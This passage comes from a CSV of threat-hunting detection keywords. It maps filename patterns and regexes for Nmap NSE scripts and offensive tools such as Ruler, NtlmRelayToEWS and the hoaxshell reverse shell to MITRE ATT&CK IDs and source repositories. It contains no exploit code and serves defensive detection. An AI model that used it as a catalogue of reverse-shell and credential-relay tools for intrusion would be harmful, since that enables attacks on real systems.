Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "*/http-ntlm/ntlmtransport*",".{0,1000}\/http\-ntlm\/ntlmtransport.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*/http-ntlm-info.nse*",".{0,1000}\/http\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-open-proxy.nse*",".{0,1000}\/http\-open\-proxy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-open-redirect.nse*",".{0,1000}\/http\-open\-redirect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-passwd.nse*",".{0,1000}\/http\-passwd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-phpmyadmin-dir-traversal.nse*",".{0,1000}\/http\-phpmyadmin\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-phpself-xss.nse*",".{0,1000}\/http\-phpself\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-php-version.nse*",".{0,1000}\/http\-php\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-proxy-brute.nse*",".{0,1000}\/http\-proxy\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-put.nse*",".{0,1000}\/http\-put\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-qnap-nas-info.nse*",".{0,1000}\/http\-qnap\-nas\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-referer-checker.nse*",".{0,1000}\/http\-referer\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/httprelayserver.py*",".{0,1000}\/httprelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*/http-request-smuggler/*",".{0,1000}\/http\-request\-smuggler\/.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*/http-rfi-spider.nse*",".{0,1000}\/http\-rfi\-spider\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-robots.txt.nse*",".{0,1000}\/http\-robots\.txt\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-robtex-reverse-ip.nse*",".{0,1000}\/http\-robtex\-reverse\-ip\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-robtex-shared-ns.nse*",".{0,1000}\/http\-robtex\-shared\-ns\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/https_payload.ps1*",".{0,1000}\/https_payload\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*/http-sap-netweaver-leak.nse*",".{0,1000}\/http\-sap\-netweaver\-leak\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-security-headers.nse*",".{0,1000}\/http\-security\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-server-header.nse*",".{0,1000}\/http\-server\-header\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-shellshock.nse*",".{0,1000}\/http\-shellshock\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-sitemap-generator.nse*",".{0,1000}\/http\-sitemap\-generator\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-slowloris.nse*",".{0,1000}\/http\-slowloris\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-slowloris-check.nse*",".{0,1000}\/http\-slowloris\-check\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-sql-injection.nse*",".{0,1000}\/http\-sql\-injection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/https-redirect.nse*",".{0,1000}\/https\-redirect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-stored-xss.nse*",".{0,1000}\/http\-stored\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-svn-enum.nse*",".{0,1000}\/http\-svn\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-svn-info.nse*",".{0,1000}\/http\-svn\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-tenda-enum.nse*",".{0,1000}\/http\-tenda\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "*/http-title.nse*",".{0,1000}\/http\-title\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-tplink-dir-traversal.nse*",".{0,1000}\/http\-tplink\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-trace.nse*",".{0,1000}\/http\-trace\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-traceroute.nse*",".{0,1000}\/http\-traceroute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-trane-info.nse*",".{0,1000}\/http\-trane\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-unsafe-output-escaping.nse*",".{0,1000}\/http\-unsafe\-output\-escaping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-useragent-tester.nse*",".{0,1000}\/http\-useragent\-tester\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-userdir-enum.nse*",".{0,1000}\/http\-userdir\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vhosts.nse*",".{0,1000}\/http\-vhosts\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-virustotal.nse*",".{0,1000}\/http\-virustotal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vlcstreamer-ls.nse*",".{0,1000}\/http\-vlcstreamer\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vmware-path-vuln.nse*",".{0,1000}\/http\-vmware\-path\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2006-3392.nse*",".{0,1000}\/http\-vuln\-cve2006\-3392\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2009-3960.nse*",".{0,1000}\/http\-vuln\-cve2009\-3960\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2010-0738.nse*",".{0,1000}\/http\-vuln\-cve2010\-0738\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2010-2861.nse*",".{0,1000}\/http\-vuln\-cve2010\-2861\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2011-3192.nse*",".{0,1000}\/http\-vuln\-cve2011\-3192\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2011-3368.nse*",".{0,1000}\/http\-vuln\-cve2011\-3368\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2012-1823.nse*",".{0,1000}\/http\-vuln\-cve2012\-1823\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2013-0156.nse*",".{0,1000}\/http\-vuln\-cve2013\-0156\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2013-6786.nse*",".{0,1000}\/http\-vuln\-cve2013\-6786\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2013-7091.nse*",".{0,1000}\/http\-vuln\-cve2013\-7091\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2014-2126.nse*",".{0,1000}\/http\-vuln\-cve2014\-2126\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2014-2127.nse*",".{0,1000}\/http\-vuln\-cve2014\-2127\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2014-2128.nse*",".{0,1000}\/http\-vuln\-cve2014\-2128\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2014-2129.nse*",".{0,1000}\/http\-vuln\-cve2014\-2129\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2014-3704.nse*",".{0,1000}\/http\-vuln\-cve2014\-3704\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2014-8877.nse*",".{0,1000}\/http\-vuln\-cve2014\-8877\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE 